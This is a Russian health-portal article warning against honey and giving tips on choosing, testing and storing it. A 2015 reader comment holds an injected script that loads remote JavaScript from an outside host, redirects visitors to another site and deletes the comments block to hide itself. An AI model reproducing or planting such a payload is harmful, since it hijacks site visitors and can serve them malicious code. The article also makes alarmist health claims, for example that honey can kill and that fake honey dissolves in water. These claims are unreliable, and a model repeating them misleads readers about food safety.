Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Мед. Продукт-«обманщик»  >>  Мед. Продукт-«обманщик»
 
Обратная связь
 

Мед. Продукт-«обманщик»

Размер шрифта
25 ноября 2011 08:13
  • google_analytics: false
  • Нравится

Горячий чай с медом или медовый пряник могут вас убить.

Недостатки меда

  1. Высокий гликемический индекс – от 60 до 87. Это значит, что мед провоцирует аппетит и увеличивает содержание глюкозы в крови. В результате может развиваться диабет 2 типа.

  2. Мед богат фруктозой. Фруктоза в отличие от глюкозы перерабатывается в печени, а не в крови. С большими объемами фруктозы печень не в состоянии справиться. Фруктоза превращается в жир и отправляется в кровоток в виде триглицеридов. Эти вещества увеличивают риск сердечно-сосудистых заболеваний.

  3. При нагревании мед выделяет канцероген – оксиметилфурфурол, который может привести к раку.


Что делать?

  1. Никогда не нагревайте мед и не используйте его при выпечке.

  2. Ешьте не больше 1-2 чайных ложек меда.


Как выбрать

  1. Смотрите состав продукта. Если есть сахароза или мальтоза (солодовый сахар), откажитесь от покупки. Эти вещества еще сильнее увеличивают гликемический индекс меда (гликемический индекс сахарозы – 61, мальтозы – почти 100!).

  2. Цветочный мед обладает меньшим гликемическим индексом.

  3. Слишком жидкий мед – признак того, что его недодержали в сотах.

  4. Берите мед в сотах. Этот продукт – более свежий и дольше хранится. Кроме того, это гарантия того, что мед сделан пчелами. Но перевозить его сложнее, чем центробежный.


Как отличить поддельный мед от настоящего

  1. Опустите мед в стакан с водой. Если он растворяется в воде – значит, продукт поддельный. Если падает куском на дно стакана – натуральный.

  2. Натуральный мед смывается с ткани.

  3. Зимой мед бывает только засахаренным. Исключения — каштановый мед и мед белой акации.


Как хранить мед

  • В герметичной упаковке, лучше в стекле, в сухом прохладном темном месте.
  • При холодной температуре мед затвердевает и белеет.
  • При теплой – темнеет, становится жиже и меняется вкус.

Как приготовить

Рецепт салата с медово-мятным соусом

  1. Порезать фрукты.

  2. Смешать мед с лимонным соком, цедрой лимона и свежими листьями мяты. Поставить соус в холодильник.

  3. Заправить салат.


Видеосюжеты по теме:

Продукты-обманщики. Мед

 

 


 

 

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - zzzzzz

01 июля 2015 в 00:05

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.